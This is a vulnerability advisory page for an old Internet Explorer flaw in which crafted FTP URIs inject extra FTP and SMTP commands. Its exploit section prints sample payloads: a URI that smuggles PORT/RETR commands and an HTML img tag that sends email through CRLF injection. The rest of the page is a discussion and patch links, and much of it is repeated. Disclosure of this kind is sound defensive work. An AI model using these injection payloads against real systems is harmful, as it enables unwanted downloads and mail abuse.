Microsoft Internet Explorer FTP URI Arbitrary FTP Server Command Execution Vulnerability
BID:11826
Info
Microsoft Internet Explorer FTP URI Arbitrary FTP Server Command Execution Vulnerability
| Bugtraq ID: | 11826 |
| Class: | Input Validation Error |
| CVE: |
CVE-2004-1166 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 06 2004 12:00AM |
| Updated: | May 12 2015 07:48PM |
| Credit: | Albert Puigsech Galicia <[email protected]> disclosed this vulnerability. |
| Vulnerable: |
Nortel Networks Symposium Agent Nortel Networks Contact Center - Agent Desktop Display 0 Nortel Networks Centrex IP Element Manager 0 Nortel Networks Centrex IP Client Manager Nortel Networks CallPilot 703t Nortel Networks CallPilot 702t Nortel Networks CallPilot 201i Nortel Networks CallPilot 200i Nortel Networks CallPilot 1002rp Microsoft Internet Explorer 5.0.1 SP4 Microsoft Internet Explorer 5.0.1 SP3 Microsoft Internet Explorer 5.0.1 SP2 Microsoft Internet Explorer 5.0.1 SP1 Microsoft Internet Explorer 5.0.1 Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 |
| Not Vulnerable: | |
Discussion
Microsoft Internet Explorer FTP URI Arbitrary FTP Server Command Execution Vulnerability
Microsoft Internet Explorer is reported prone to an arbitrary FTP server command-execution vulnerability. This issue is due to the application's failure to properly sanitize user-supplied URI input before using it to execute FTP commands on remote servers.
This vulnerability allows attackers to embed arbitrary FTP server commands in malicious URIs. Upon following this malicious URI, the victim user's browser will reportedly connect to the attacker-specified FTP server, and the malicious commands will be sent to the server. This may allow malicious files to be downloaded to the victim's computer without their knowledge. Other attacks are also likely possible.
Note: Reportedly, this issue can be leveraged to send email to arbitrary addresses without user interaction.
Microsoft Internet Explorer is reported prone to an arbitrary FTP server command-execution vulnerability. This issue is due to the application's failure to properly sanitize user-supplied URI input before using it to execute FTP commands on remote servers.
This vulnerability allows attackers to embed arbitrary FTP server commands in malicious URIs. Upon following this malicious URI, the victim user's browser will reportedly connect to the attacker-specified FTP server, and the malicious commands will be sent to the server. This may allow malicious files to be downloaded to the victim's computer without their knowledge. Other attacks are also likely possible.
Note: Reportedly, this issue can be leveraged to send email to arbitrary addresses without user interaction.
Exploit / POC
Microsoft Internet Explorer FTP URI Arbitrary FTP Server Command Execution Vulnerability
An example URI sufficient to exploit this vulnerability is provided:
ftp://ftp.example.com/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file
The 'a,b,c,d,e,f' would represent the IP address and port specifications, as per the FTP RFCs.
This issue has also been reported to allow for the sending of email without user interaction. Embedding the following image into an HTML page reportedly sends an email:
<img src="ftp://foo%0d%0aHELO%20mail%0d%0aMAIL%20FROM%3a&lt;&gt;%0d%0aRCPT%20TO%3a&lt;username%40example.com&gt;%0d%0aDATA%0d%0aSubject%3a%20hacked%0d%0aTo%3a%20username%40example.com%0d%0a%0d%0ahacked%0d%0a.%0d%0a:[email protected]:25/" />
An example URI sufficient to exploit this vulnerability is provided:
ftp://ftp.example.com/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file
The 'a,b,c,d,e,f' would represent the IP address and port specifications, as per the FTP RFCs.
This issue has also been reported to allow for the sending of email without user interaction. Embedding the following image into an HTML page reportedly sends an email:
<img src="ftp://foo%0d%0aHELO%20mail%0d%0aMAIL%20FROM%3a&lt;&gt;%0d%0aRCPT%20TO%3a&lt;username%40example.com&gt;%0d%0aDATA%0d%0aSubject%3a%20hacked%0d%0aTo%3a%20username%40example.com%0d%0a%0d%0ahacked%0d%0a.%0d%0a:[email protected]:25/" />
Solution / Fix
Microsoft Internet Explorer FTP URI Arbitrary FTP Server Command Execution Vulnerability
Solution:
Microsoft has released a security bulletin to address this issue. Please refer to the referenced security bulletin for more information.
MS06-042 has been reissued to address a vulnerability introduced with the previous fixes. Please see BID 19667 (Microsoft Internet Explorer HTTP 1.1 and Compression Long URI Buffer Overflow Vulnerability) for further information on this issue.
Microsoft Security Bulletin MS06-042 has been updated to address a flaw in Mshtml.dll that was introduced in the previous fixes. Please see the referenced advisory for more information.
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP4
Solution:
Microsoft has released a security bulletin to address this issue. Please refer to the referenced security bulletin for more information.
MS06-042 has been reissued to address a vulnerability introduced with the previous fixes. Please see BID 19667 (Microsoft Internet Explorer HTTP 1.1 and Compression Long URI Buffer Overflow Vulnerability) for further information on this issue.
Microsoft Security Bulletin MS06-042 has been updated to address a flaw in Mshtml.dll that was introduced in the previous fixes. Please see the referenced advisory for more information.
Microsoft Internet Explorer 6.0 SP1
-
Microsoft Cumulative Update for Internet Explorer 6 SP1 (KB918899)
Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4 or on Microsoft Windows XP Service Pack 1
http://www.microsoft.com/downloads/details.aspx?FamilyId=C335CAA9-B9E6 -403D-A039-2D3DCA723653 -
Microsoft Cumulative Update for Internet Explorer for Windows Server 2003 x64 Edition (KB918899)
Internet Explorer 6 for Microsoft Windows Server 2003 x64 Edition
http://www.microsoft.com/downloads/details.aspx?familyid=5C2A23AC-3F2E -4BEC-BE16-4B45B44C6346 -
Microsoft Cumulative Update for Internet Explorer for Windows XP x64 Edition (KB918899)
Internet Explorer 6 for Microsoft Windows XP Professional x64 Edition
http://www.microsoft.com/downloads/details.aspx?familyid=0CE7F66D-4D83 -4090-A034-9BBE286D96FA
Microsoft Internet Explorer 6.0
-
Microsoft Cumulative Update for Internet Explorer for Windows Server 2003 (KB918899)
Internet Explorer 6 for Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
http://www.microsoft.com/downloads/details.aspx?familyid=20288DA2-A308 -45C6-BD80-C68C997529BD -
Microsoft Cumulative Update for Internet Explorer for Windows Server 2003 64-bit Itanium Edition (KB918899)
Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
http://www.microsoft.com/downloads/details.aspx?familyid=663F1E83-BDC0 -4EC6-A263-398E7222C9B5 -
Microsoft Cumulative Update for Internet Explorer for Windows Server 2003 x64 Edition (KB918899)
Internet Explorer 6 for Microsoft Windows Server 2003 x64 Edition
http://www.microsoft.com/downloads/details.aspx?familyid=5C2A23AC-3F2E -4BEC-BE16-4B45B44C6346 -
Microsoft Cumulative Update for Internet Explorer for Windows XP Service Pack 2 (KB918899)
Internet Explorer 6 for Microsoft Windows XP Service Pack 2
http://www.microsoft.com/downloads/details.aspx?familyid=CDB85BCA-0C17 -44AA-B74E-F01B5392BB31 -
Microsoft Cumulative Update for Internet Explorer for Windows XP x64 Edition (KB918899)
Internet Explorer 6 for Microsoft Windows XP Professional x64 Edition
http://www.microsoft.com/downloads/details.aspx?familyid=0CE7F66D-4D83 -4090-A034-9BBE286D96FA
Microsoft Internet Explorer 5.0.1 SP4
-
Microsoft Cumulative Update for Internet Explorer 5.01 Service Pack 4 (KB918899)
Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4
http://www.microsoft.com/downloads/details.aspx?familyid=0DE3F143-19A6 -4F22-B53B-B6A7DA33DAF4
References
Microsoft Internet Explorer FTP URI Arbitrary FTP Server Command Execution Vulnerability
References:
References: